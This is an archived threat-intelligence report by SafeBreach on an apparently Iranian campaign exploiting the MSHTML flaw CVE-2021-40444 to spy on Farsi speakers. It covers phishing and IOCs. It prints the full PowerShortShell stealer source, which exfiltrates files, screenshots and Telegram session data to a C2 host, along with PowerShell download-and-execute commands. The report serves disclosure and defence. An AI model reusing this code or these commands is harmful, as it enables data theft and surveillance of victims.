{ "id": "a75be9a4-6709-4fe4-9a54-b97edbdd8923", "created_at": "2026-04-06T00:12:57.952181Z", "updated_at": "2026-04-10T13:12:22.227014Z", "deleted_at": null, "sha1_hash": "229477d926fdd8ee0a5b342b04d17432ac767941", "title": "New PowerShortShell Stealer Exploits Recent Microsoft MSHTML Vulnerability to Spy on Farsi Speakers - SafeBreach", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1236615, "plain_text": "New PowerShortShell Stealer Exploits Recent Microsoft MSHTML\r\nVulnerability to Spy on Farsi Speakers - SafeBreach\r\nBy Author:  Tomer Bar, VP Security Research, SafeBreach\r\nArchived: 2026-04-05 17:34:01 UTC\r\nSummary\r\nSafeBreach Labs discovered a new Iranian threat actor using a Microsoft MSHTML Remote Code Execution\r\n(RCE) exploit for infecting Farsi-speaking victims with a new PowerShell stealer. The threat actor initiated the\r\nattack in mid-September 2021, and it was first reported by ShadowChasing[1] on Twitter. However, the\r\nPowerShell Stealer hash/code was not published and was not included in VirusTotal or other public malware\r\nrepositories.\r\nSafeBreach Labs analyzed the full attack chain, discovered new phishing attacks which started in July this year\r\nand achieved the last and most interesting piece of the puzzle – the PowerShell Stealer code – which we named\r\nPowerShortShell. The reason we chose this name is due to the fact that the stealer is a PowerShell script, short\r\nwith powerful collection capabilities – in only \\~150 lines, it provides the adversary a lot of critical information\r\nincluding screen captures, telegram files, document collection, and extensive data about the victim’s environment.\r\nAlmost half of the victims are located in the United States. Based on the Microsoft Word document content –\r\nwhich blames Iran’s leader for the “Corona massacre” and the nature of the collected data, we assume that the\r\nvictims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime. The adversary\r\nmight be tied to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like\r\nInfy, Ferocious Kitten, and Rampant Kitten. Surprisingly, the usage of exploits for the infection is quite unique to\r\nIranian threat actors which in most cases heavily rely on social engineering tricks.\r\nIn this research, we will explain the attack chain, which includes two different Microsoft Word exploit files,\r\ndescribe the information stealer malware capabilities (the full source code is provided in the appendix), provide a\r\nheat map of known victims, and explain the phishing attacks.****\r\nAttack Sequence Overview\r\nFirst, we will provide an overview of the CVE-2021-40444 exploit’s steps[2][3]:\r\n1. Step1 – The attack starts by sending a spear phishing mail (with a Winword attachment) that the victim\r\nis lured to open.\r\n2. Step 2 – The Word file connects to the malicious server, executes the malicious html, and then drops a\r\nDLL to the %temp% directory.\r\n1. A relationship stored in the xml file document.xml.rels points to a malicious html on the C2 server:\r\nmshtml:http://hr[.]dedyn[.]io/image.html.\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 1 of 16\n\n2. The JScript within the HTML contains an object pointing to a CAB file and an iframe pointing to an\r\nINF file, prefixed with the “.cpl:” directive.\r\n3. The CAB file is opened. Due to a directory traversal vulnerability in the CAB, it’s possible to store\r\nthe msword.inf file in %TEMP%.\r\n3. Step 3 – The malicious DLL executes the PowerShell script.\r\n1. The INF file is opened with the “.cpl:” directive, causing the side-loading of the INF file via\r\nrundll32: for example: ‘.cpl:../../../../../Temp/Low/msword.inf’.\r\n2. Msword.inf is a dll downloads and executes the final payload (PowerShell script).\r\n3. The PowerShell script collects data and exfiltrates it to the attacker’s C2 server.\r\nIn the next few sections, we will go over each step and provide additional data and explanations.\r\nDetailed Attack Sequence\r\nFirst Step – The victims opens a Winword document in Farsi\r\nThe first exploit document is called: Mozdor.docx. It includes images of Iranian soldiers. It exploits the CVE-2021-40444 vulnerability.\r\nThe second exploit document is: ای خامنه جنایات.docx (Khamenei Crimes.docx). It says:\r\n“One week with Khamenei; Complain against the perpetrators of the Corona massacre, including the leader”\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 2 of 16\n\nIt includes links to the following Iranian news site and Twitter account:\r\n1. The https://www.hamshahrionline.ir/ news website\r\nTwitter of IranWire Journalist\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 3 of 16\n\nStep 2 – Exploit Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444\r\nThe Word files connect to the malicious server, execute the malicious html, and then drop a dll to the %temp%\r\ndirectory. The mozdor.docx file includes an exploit in the file document.xml.rels. It executes\r\nmshtml:http://hr[.]dedyn[.]io/image.html, while the second docx executes mshtml:http://hr.dedyn.io/word.html.\r\nWord.html executes a dll with an inf extension. It downloads and extracts http://hr.dedyn.io/word.cab, which\r\nincludes a dll with a directory traversal ..\\Msword.inf which extracts and is executed by\r\ncpl:’.cpl:../../../../../Temp/Low/msword.inf’\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 4 of 16\n\nStep 3 – The DLL executes PowerShell to download and execute 1.ps1\r\nMsword.inf is the dll used to download and execute PowerShortShell (1.ps1 script file)\r\npowershell.exe -windowstyle hidden (new-object system.Net.WebClient).DownloadFile(‘http://hr.dedyn.io/1.ps1‘,\r\n‘C:/windows/temp/1.ps1’)\r\npowershell.exe -windowstyle hidden -ExecutionPolicy Unrestricted -File “C:/windows/temp/1.ps1\r\nFinal step – PowerShortShell – 1.ps1\r\nThe PowerShell code consists of 153 lines which support:\r\nExfiltration of system info and files to “https://hr.dedyn.io/upload.aspx?fn=”\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 5 of 16\n\nExfiltration of Telegram files to “https://hr.dedyn.io/upload2.aspx”\r\nPhishing\r\nThe exploit attack described above started on September 15, 2021. We found that the adversary started two\r\nphishing campaigns by collecting credentials for Gmail and Instagram in July 2021 using the same C2 server –\r\nDeltaban[.]dedyn[.]io – a phishing HTML page masquerading as the legit deltaban.com travel agency:\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 6 of 16\n\nThis is a phishing site. A click will transfer the victim to an Iranian short URL: https://yun[.]ir/jcccj.\r\nThis URL will resolve to signin[.]dedyn[.]io/Social/GoogleFinish._ The domain was registered in July 2021.\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 7 of 16\n\nThe stolen credentials are stored in the file out.txt, which is of course available for browsing.\r\nOne of the victims is probably of Indian origin.\r\nInstagram Phishing\r\nWe also found that this site is used for Instagram credential theft:\r\nhttps://signin[.]dedyn[.]io/Social/Instagram/Account. The credentials are saved to the same out.txt file.\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 8 of 16\n\nVictims\r\nThe exact victims are unknown but we were able to build a victims heat map.\r\nAppendix A – IOC’s\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 9 of 16\n\nAll of the following resolved to 95.217.50.126:\r\n1. hr.dedyn.io – C2 and infection server\r\n2. signin.dedyn.io – phishing\r\n3. Irkodex.dedyn.io – phishing\r\n4. Deltaban.dedyn.io – phishing **\r\n**\r\n1.ps1 – PowerShortShell\r\nF69595FD06582FE1426D403844696410904D27E7624F0DCF65D6EA57E0265168\r\nCab file which includes a dll with directory traversal ..\\Msword.inf\r\nCe962676090195a5f829e7baf013a3213b3b32e27c9631dc932aab2ce46a6b9b\r\nMsword.inf – dll to download and execute 1.ps1\r\n5d7a683a6231a4dc0fcc71c4b6d413c6655c7a0e5c58452d321614954d7030d3\r\nE093cce6a4066aa37ed68121fe1464a3e130a3ce0fbb89e8b13651fd7dab842b\r\nJscript – part of the html file\r\n6e730b257c3e0c5ce6c73ff0f6732ad2d09f000b423085303a928e665dbbee16\r\nWord.html,image.html,index.html – html file exploit\r\n374239d2056a8a20b05d4bf4431a852af330f2675158afde8de71ac5b991e273\r\nB378a1136fddcd533cbdf7473175bf5d34f5eb86436b8eb651435eb3a27a87c6\r\n11368964D768D7FA4AB48100B231790C3D23C45EEDFC7A73ACD7F3FEC703ACA7\r\nDocument.xml.rels – Xml files 28ad066cfe08fcce77974ef469c32e4d2a762e50d6b95b8569e34199d679bde8\r\n5AC4574929A8825A5D4F267544C33D02919AB38F38F21CE5C9389B67DF241B43\r\nWill download mshtml:http://hr.dedyn.io/image.html and http://hr.dedyn.io/word.html**\r\nDocx infectors**\r\nD793193c2d0c31bC23639725b097a6a0ffbe9f60a46eabfe0128e006f0492a08\r\nMozdor.docx – 0b90ef87dbbb9e6e4a5e5027116d4d7c4bc2824a491292263eb8a7bda8afb7bd\r\nPreviousRelated Research\r\nAppendix B – PowerShortShell Stealer source code\r\nRemove-Item –path C:\\Windows\\Temp\\1.ps1\r\nAdd-Type -assembly “system.io.compression.filesystem”\r\n$source = “C:\\windows\\temp\\8f720a5db6c7”\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 10 of 16\n\n$destination = “https://hr.dedyn.io/upload.aspx?fn=”\r\n$destination2 = “https://hr.dedyn.io/upload2.aspx”\r\n$log = “c:\\windows\\temp\\777.log”\r\nfunction Pos-Da($dest,$url)\r\n{\r\ntry{\r\n$buffer = [System.IO.File]::ReadAllBytes($dest)\r\n[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url)\r\n$webRequest.Timeout =10000000\r\n$webRequest.Method = “POST”\r\n$webRequest.ContentType = “application/data”\r\n$requestStream = $webRequest.GetRequestStream()\r\n$requestStream.Write($buffer, 0, $buffer.Length)\r\n$requestStream.Flush()\r\n$requestStream.Close()\r\n[System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()\r\n$streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())\r\n$result = $streamReader.ReadToEnd()\r\n$streamReader.Close()\r\n}\r\ncatch\r\n{\r\nWrite-Error $_.Exception.Message | out-file $log -Append\r\n}\r\n}\r\nfunction Get-ScreenCapture\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 11 of 16\n\n{\r\nparam(\r\n[Switch]$OfWindow\r\n)\r\nbegin {\r\nAdd-Type -AssemblyName System.Drawing\r\n$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |\r\nWhere-Object { $_.FormatDescription -eq “JPEG” }\r\n}\r\nprocess {\r\nStart-Sleep -Milliseconds 250\r\nif ($OfWindow) {\r\n[Windows.Forms.Sendkeys]::SendWait(“%{PrtSc}”)\r\n} else {\r\n[Windows.Forms.Sendkeys]::SendWait(“{PrtSc}”)\r\n}\r\nStart-Sleep -Milliseconds 250\r\n$bitmap = [Windows.Forms.Clipboard]::GetImage()\r\n$ep = New-Object Drawing.Imaging.EncoderParameters\r\n$ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality,\r\n[long]100)\r\n$screenCapturePathBase = “$source\\ScreenCapture”\r\n$c = 0\r\nwhile (Test-Path “${screenCapturePathBase}${c}.jpg”) {\r\n$c++\r\n}\r\n$bitmap.Save(“${screenCapturePathBase}${c}.jpg”, $jpegCodec, $ep)\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 12 of 16\n\n}\r\n}\r\nNew-Item -ItemType directory -Path $source\r\nGet-WmiObject -class win32_computersystem | Out-File $source\\summary.txt\r\nGet-WmiObject Win32_BIOS -computerName localhost | Out-File $source\\bios.txt;\r\nGet-WmiObject -Class “win32_PhysicalMemory” -namespace “root\\CIMV2” | Out-File $source\\ram.txt;\r\n@(Get-WmiObject -class win32_processor | Select Caption, Description, NumberOfCores,\r\nNumberOfLogicalProcessors, Name, Manufacturer, SystemCreationClassName, Version) | Out-File\r\n$source\\cpu.txt;\r\ngwmi Win32NetworkAdapterConfiguration | Where { $.IPAddress } | Select -Expand IPAddress | Out-File\r\n$source\\ip.txt;\r\ngwmi Win32_NetworkAdapterConfiguration | Out-File $source\\NetworkAdapterConfig.txt;\r\nget-WmiObject win32_logicaldisk | Out-File $source\\disk.txt;\r\nGet-Process | Out-File -filepath $source\\process.txt;\r\nGet-NetAdapter | Out-File $source\\NetworkAdapter.txt;\r\n#net view | Out-File $source\\NetView.txt;\r\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize | Out-File\r\n$source\\apps.txt;\r\nipconfig /all | Out-File $source\\ipConfig.txt;\r\nnetstat -ano | Out-File $source\\netstat.txt;\r\narp -a -v | Out-File $source\\arp.txt;\r\nnet user | Out-File $source\\netuser.txt;\r\nGet-CimInstance Win32_OperatingSystem | FL * | Out-File $source\\os.txt;\r\nGet-ExecutionPolicy -List | Out-File $source\\policy.txt;\r\nGet-Service | Out-File $source\\service.txt;\r\nGet-ScreenCapture\r\n$files = Get-ChildItem $source\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 13 of 16\n\nforeach ($file in $files)\r\n{\r\nPos-Da -dest $file.FullName -url “$destination+$file”\r\n}\r\n$path= Split-Path -Path (Get-WMIObject Win32LogicalDisk -filter “DriveType = 3” | Select-Object DeviceID |\r\nForEach-Object {Get-Childitem ($.DeviceID + “\\”) -Attributes !Directory,!Directory+Hidden -include\r\nTelegram.exe -recurse})\r\n$index=0\r\nforeach ($a in $path)\r\n{\r\ntry{\r\n$tempDwn=”C:\\windows\\temp\\tdata{0}” -f $index\r\nNew-Item -ItemType Directory -Force -Path $tempDwn”\\D877F783D5D3EF8C”\r\n$source= $a+”\\tdata\\D877F783D5D3EF8C”\r\nif(Test-Path -Path $source)\r\n{\r\n$d8files=Get-ChildItem -Path $source | Where-Object {$_.Name.Contains(“map”)} | select FullName, Name\r\nforeach($d8 in $d8files)\r\n{\r\n$mtemp=”{0}\\D877F783D5D3EF8C\\{1}” -f $tempDwn, $d8.Name\r\nCopy-Item $d8.FullName -Destination $mtemp\r\n}\r\nelse {\r\ncontinue\r\n}\r\n$tempFiles=Get-ChildItem -Path $a”\\tdata” | Where-Object {$_.PSIsContainer -eq $false} | select FullName,\r\nName\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 14 of 16\n\nforeach ($file in $tempFiles)\r\n{\r\ntry\r\n{\r\n$destTemp=”{0}\\{1}” -f $tempDwn, $file.Name\r\nCopy-Item $file.FullName -Destination $destTemp\r\n}\r\nCatch{}\r\n}\r\necho $tempDwn\r\n$dest=”C:\\windows\\temp\\tdata{0}.zip” -f $index\r\n[io.compression.zipfile]::CreateFromDirectory($tempDwn, $dest)\r\nStart-Sleep -s 15\r\nPos-Da -dest $dest -url $destination2\r\n}\r\ncatch\r\n{\r\nWrite-Error $_.Exception.Message | out-file $log -Append\r\n}\r\n$index++\r\nStart-Sleep -s 15\r\nRemove-Item –path $dest\r\nRemove-Item –path $tempDwn -Recurse\r\n}\r\n$files = (Get-WMIObject Win32LogicalDisk -filter “DriveType = 3” | Select-Object DeviceID | ForEach-Object\r\n{Get-Childitem ($.DeviceID + “\\”) -include .doc,.docx,.pptx,.pdf,.txt,.xls,.xlsx,.bak,.db,.mdb,*.accdb -recurse})\r\nforeach ($file in $files)\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 15 of 16\n\n{\r\n$destUrl=”{0}{1}” -f $destination, $file.Name\r\nPos-Da -dest $file.FullName -url $destUrl\r\nStart-Sleep -s 5\r\n}\r\nRemove-Item –path $source -Recurse\r\nRemove-Item -path $log\r\nReference\r\n[1]https://twitter.com/ShadowChasing1/status/1438126675565244417\r\n[2]https://github.com/klezVirus/CVE-2021-40444\r\n[3]https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/\r\nSource: https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-sp\r\neakers/\r\nhttps://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/" ], "report_names": [ "new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers" ], "threat_actors": [ { "id": "4a1e62ec-42d0-47c3-8b65-b3c5d9c496c0", "created_at": "2022-10-25T16:07:23.609046Z", "updated_at": "2026-04-10T02:00:04.686029Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [ "G0137" ], "source_name": "ETDA:Ferocious Kitten", "tools": [ "MarkiRAT" ], "source_id": "ETDA", "reports": null }, { "id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1", "created_at": "2023-01-06T13:46:38.561288Z", "updated_at": "2026-04-10T02:00:03.024326Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "Operation Mermaid", "Prince of Persia", "Foudre" ], "source_name": "MISPGALAXY:Infy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e580dec5-1558-4c79-8eda-c968d1cd206f", "created_at": "2022-10-25T16:07:24.090829Z", "updated_at": "2026-04-10T02:00:04.863398Z", "deleted_at": null, "main_name": "Rampant Kitten", "aliases": [], "source_name": "ETDA:Rampant Kitten", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "75297180-4681-4500-ad0e-cde0edeb1ed2", "created_at": "2024-02-06T02:00:04.156486Z", "updated_at": "2026-04-10T02:00:03.581217Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [], "source_name": "MISPGALAXY:Ferocious Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "306b00c6-fec4-4698-86c5-2aed9feedd38", "created_at": "2022-10-25T15:50:23.444155Z", "updated_at": "2026-04-10T02:00:05.401052Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [ "Ferocious Kitten" ], "source_name": "MITRE:Ferocious Kitten", "tools": [ "MarkiRAT", "BITSAdmin" ], "source_id": "MITRE", "reports": null }, { "id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39", "created_at": "2022-10-25T16:07:23.734244Z", "updated_at": "2026-04-10T02:00:04.731031Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "APT-C-07", "Infy", "Operation Mermaid", "Prince of Persia" ], "source_name": "ETDA:Infy", "tools": [ "Foudre", "Infy", "Tonnerre" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434377, "ts_updated_at": 1775826742, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/229477d926fdd8ee0a5b342b04d17432ac767941.pdf", "text": "https://archive.orkl.eu/229477d926fdd8ee0a5b342b04d17432ac767941.txt", "img": "https://archive.orkl.eu/229477d926fdd8ee0a5b342b04d17432ac767941.jpg" } }